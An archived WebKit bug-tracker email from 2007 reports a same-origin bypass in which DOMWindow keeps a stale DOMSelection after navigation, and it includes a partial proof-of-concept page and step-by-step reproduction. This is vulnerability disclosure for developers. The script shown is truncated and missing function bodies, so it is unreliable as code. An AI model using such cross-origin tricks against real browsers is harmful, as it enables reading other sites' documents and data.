[Webkit-unassigned] [Bug 14610] New: Security problem in DOMWindow

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Fri Jul 13 11:12:42 PDT 2007


           Summary: Security problem in DOMWindow
           Product: WebKit
           Version: 522+ (nightly)
          Platform: All
        OS/Version: All
            Status: NEW
          Keywords: EasyFix, NeedsRadar
          Severity: Normal
          Priority: P1
         Component: WebCore JavaScript
        AssignedTo: webkit-unassigned at lists.webkit.org
        ReportedBy: ian.eng.webkit at gmail.com

The problem was introduced by recent code refactoring in kjs_window
and DOMWindow. When navigating to a new page, DOMWindow does nott
clear up its DOMSelection object.

To show the problem, save following text into a file, say 'selection.html':

var child;
var sel;

function openwin() {
 child = open("hello.html");
function getsel() {
 sel = child.getSelection();
function reloadwin() {
function check() {
 var selected = sel.anchorNode;
 var new_doc = selected.ownerDocument;

<button onclick="openwin()">open</button>
<button onclick="getsel()">get selection</button>
<button onclick="reloadwin()">reload</button>
<button onclick="check()">check</button>

Also create two files called hello.html, and world.html.

Put selection.html and hello.html in the same domain, and put
world.html in a different domain (you need to change URLs of
hello.html and world.html in selection.html).

Do following steps:
1. load 'selection.html' in a new window;
2. click the 'open' button, it opens a child window;
3. select "hello" text in the child window;
4. click the 'get selection' in the parent window;
5. click the 'check' button, an alert window pops up and displays the
URL of 'hello.html'.

So far so good.

6. click the 'reload' button in the parent window, it loads
'world.html' page in the child window.
   Note that now, the parent window and the child window are in
different domains.
7. select 'world' in the child window;
8. click the 'check' button in the first window. an alert window pops
up, and displays the URL of 'world.html'.  At this point, the parent
window has full access to the Document object and DOM nodes under it
in the child window even they are from different domains.

I will make a patch later.

Configure bugmail: http://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug, or are watching the assignee.

More information about the webkit-unassigned mailing list